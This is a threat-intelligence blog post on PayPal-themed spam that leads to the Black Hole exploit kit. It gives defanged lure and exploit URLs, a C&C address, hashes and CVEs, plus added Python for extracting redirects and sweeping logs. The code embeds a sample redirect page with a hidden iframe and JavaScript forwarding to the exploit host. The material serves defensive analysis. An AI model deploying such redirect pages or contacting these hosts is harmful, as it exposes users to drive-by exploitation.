Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole exploit kit


By Dancho Danchev

Sticking to their well-proven social engineering tactic of systematically rotating the abused brands, cybercriminals are currently spamvertising millions of emails impersonating PayPal, in an attempt to trick both home and corporate users into interacting with the malicious campaign.

Once the interaction takes place, users are exposed to the client-side exploits served by the Black Hole exploit kit, currently the market share leader within the cybercrime ecosystem.

More details:

Screenshot of the spamvertised email:

Upon clicking on the link, users are exposed to a bogus “Page loading…” page that silently forwards them to the exploit kit:

Spamvertised URLs:
hxxp://earbudsforrunning.com/welcpp.html
hxxp://vitva-musicgroup.com/wp-content/uploads/fgallery/traninfo.html
hxxp://imune.org.br/traninfo.html

Client-side exploit serving URL: hxxp://teloexpressions.org/main.php?page=9aca5bbc34d3ebd6
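The redirection step above is where the spamvertised page hands the browser to the exploit-serving URL. The following is an added example, not code from the post or from the campaign: it parses a constructed “Page loading…” page (the markup is assumed; the hosts are the ones listed above) and pulls out every forwarding mechanism such a page typically carries (meta refresh, hidden iframe, JavaScript location change), resolving relative targets against the page that served them and defanging the result for a report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample of a bogus "Page loading..." redirection page. The markup is
# assumed for illustration; it is not the campaign's actual script. The forwarding
# target is the exploit-serving URL named in the post.
SAMPLE_REDIRECT_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; url=http://teloexpressions.org/main.php?page=9aca5bbc34d3ebd6">
<title>Page loading...</title></head>
<body><h1>Page loading...</h1>
<iframe src="//teloexpressions.org/main.php?page=9aca5bbc34d3ebd6" width="1" height="1" style="visibility:hidden"></iframe>
<script>setTimeout(function(){window.location="http://teloexpressions.org/main.php?page=9aca5bbc34d3ebd6";},500);</script>
</body></html>"""


class RedirectExtractor(HTMLParser):
    """Collect every place an HTML page can forward the browser without a click:
    meta refresh, (hidden) iframes and JavaScript location assignments."""

    META_URL = re.compile(r"url\s*=\s*['\"]?([^'\"\s>]+)", re.I)
    JS_LOCATION = re.compile(
        r"(?:window|document|top|self|parent)\.location(?:\.href)?\s*"
        r"(?:=\s*|\.replace\(\s*)['\"]([^'\"]+)['\"]", re.I)

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.targets = []          # (mechanism, absolute url) in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = self.META_URL.search(a.get("content", ""))
            if m:
                self._add("meta-refresh", m.group(1))
        elif tag == "iframe" and a.get("src"):
            self._add("iframe", a["src"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data as raw text
        if self._in_script:
            for m in self.JS_LOCATION.finditer(data):
                self._add("javascript", m.group(1))

    def _add(self, how, url):
        # Relative and scheme-relative targets are resolved against the page that served them
        self.targets.append((how, urljoin(self.base_url, url)))


def extract_redirects(html, base_url):
    """Return [(mechanism, absolute_url), ...] for every forwarding target in the page."""
    p = RedirectExtractor(base_url)
    p.feed(html)
    p.close()
    return p.targets


def exploit_gate_hosts(targets):
    """Distinct hosts the page forwards to; these are the hosts to block or hunt for."""
    return sorted({urlsplit(url).hostname for _, url in targets})


def defang(url):
    """Write a URL so it cannot be clicked by accident: http -> hxxp, dots in the host -> [.]"""
    p = urlsplit(url)
    scheme = {"http": "hxxp", "https": "hxxps"}.get(p.scheme, p.scheme)
    out = f"{scheme}://{p.netloc.replace('.', '[.]')}{p.path}"
    if p.query:
        out += "?" + p.query
    return out


if __name__ == "__main__":
    found = extract_redirects(SAMPLE_REDIRECT_PAGE, "http://earbudsforrunning.com/welcpp.html")
    for how, url in found:
        print(f"{how:13s} {defang(url)}")
    print("gate hosts:", exploit_gate_hosts(found))
```

Running it against the constructed page reports all three mechanisms pointing at the same exploit gate; on a real capture the interesting case is when the mechanisms disagree, which usually means a decoy plus a hidden real target.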

Client-side exploits served: CVE-2010-0188 (Adobe Reader/Acrobat, libtiff TIFF handling), CVE-2010-1885 (Microsoft Windows Help and Support Center, hcp:// protocol handler)

Detection rate for a sample redirection script: MD5: 2276947d2f3a7abc88e89089e65dce23

Upon successful client-side exploitation, the campaign drops MD5: 05e0958ef184a27377044655d7b23cb0 on the affected hosts, detected by 28 out of 41 antivirus scanners as Trojan.Generic.KDV.679870; Trojan-Dropper.Win32.Dapato.bnej.

Upon execution the sample phones back to a well-known command and control server, 87.204.199.100/mx5/B/in/, which we’ve already seen in several previously profiled malware-serving campaigns.
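Taken together, the indicators above describe the whole chain: lure URL, Black Hole landing URL, dropped binary, C&C check-in. The following is an added example, not part of the post, of how a responder would sweep proxy logs and collected file hashes against these indicators and rank affected hosts by how far down the chain they got. The log format and the log lines are constructed for illustration; the only indicator that is generalized beyond the post is the landing URL, whose main.php?page=<16 hex> shape is treated as a pattern so that the same gate with a rotated page token is still caught.

```python
import re
from urllib.parse import urlsplit

# Indicators exactly as listed in the post, kept defanged and refanged only for matching.
SPAMVERTISED_URLS = {
    "hxxp://earbudsforrunning.com/welcpp.html",
    "hxxp://vitva-musicgroup.com/wp-content/uploads/fgallery/traninfo.html",
    "hxxp://imune.org.br/traninfo.html",
}
EXPLOIT_SERVING_URL = "hxxp://teloexpressions.org/main.php?page=9aca5bbc34d3ebd6"
C2_URL = "hxxp://87.204.199.100/mx5/B/in/"
KNOWN_MD5 = {
    "2276947d2f3a7abc88e89089e65dce23": "redirection script",
    "05e0958ef184a27377044655d7b23cb0": "dropped payload (Trojan-Dropper.Win32.Dapato.bnej)",
}
# Assumption: generalize the landing URL's "main.php?page=<16 hex>" shape to any host,
# so a rotated gate or page token is still flagged. Exact-URL hits are caught first.
LANDING_PATTERN = re.compile(r"^/main\.php\?page=[0-9a-f]{16}$")

# Constructed proxy log, "epoch client method url status" per line. Not real traffic.
SAMPLE_PROXY_LOG = """\
1341234567.001 10.0.0.12 GET http://earbudsforrunning.com/welcpp.html 200
1341234568.310 10.0.0.12 GET http://teloexpressions.org/main.php?page=9aca5bbc34d3ebd6 200
1341234590.010 10.0.0.12 POST http://87.204.199.100/mx5/B/in/ 200
1341234600.000 10.0.0.44 GET https://www.paypal.com/ 200
1341234601.000 10.0.0.51 GET http://teloexpressions.org/main.php?page=0123456789abcdef 200
1341234602.000 10.0.0.51 GET http://www.example.com/ 200
"""


def refang(url):
    return re.sub(r"^hxxp", "http", url, flags=re.I).replace("[.]", ".")


def stage_of(url):
    """Map one requested URL to the kill-chain stage it evidences, or None."""
    u = refang(url)
    if u in {refang(x) for x in SPAMVERTISED_URLS}:
        return "lure"
    if u == refang(EXPLOIT_SERVING_URL):
        return "landing"
    parts = urlsplit(u)
    if LANDING_PATTERN.match(parts.path + "?" + parts.query):
        return "landing"
    if u.startswith(refang(C2_URL)):
        return "c2"
    return None


def sweep(log_text):
    """Return {client: {"stages": [first-seen order], "hits": [(epoch, stage, url)]}}."""
    report = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        epoch, client, _method, url, _status = line.split()
        stage = stage_of(url)
        if stage is None:
            continue
        entry = report.setdefault(client, {"stages": [], "hits": []})
        if stage not in entry["stages"]:
            entry["stages"].append(stage)
        entry["hits"].append((float(epoch), stage, url))
    return report


def classify(entry):
    """Rank a host by the deepest stage observed: a C&C check-in means the payload ran."""
    stages = set(entry["stages"])
    if "c2" in stages:
        return "compromised"
    if "landing" in stages:
        return "exploit attempt"
    if "lure" in stages:
        return "clicked lure"
    return "clean"


def check_hashes(observed_md5s):
    """Match MD5s gathered from hosts against the post's samples, case-insensitively."""
    hits = {}
    for h in observed_md5s:
        key = h.strip().lower()
        if key in KNOWN_MD5:
            hits[key] = KNOWN_MD5[key]
    return hits


if __name__ == "__main__":
    for client, entry in sweep(SAMPLE_PROXY_LOG).items():
        print(f"{client:12s} {classify(entry):16s} {' -> '.join(entry['stages'])}")
    print(check_hashes(["05E0958EF184A27377044655D7B23CB0"]))
```

A host that reached the landing page but never contacted the C&C is still worth a look: the exploit may have failed for that browser and plugin mix, or the check-in may have gone out over a path the proxy did not see.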

As we’ve already predicted, the cybercriminal or gang of cybercriminals behind these persistent and massive spam campaigns will simply continue rotating the impersonated brands in an attempt to target millions of users across multiple Web properties.

PayPal has information on their website to help users identify legitimate emails.

Webroot SecureAnywhere users are proactively protected from this threat.

You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.
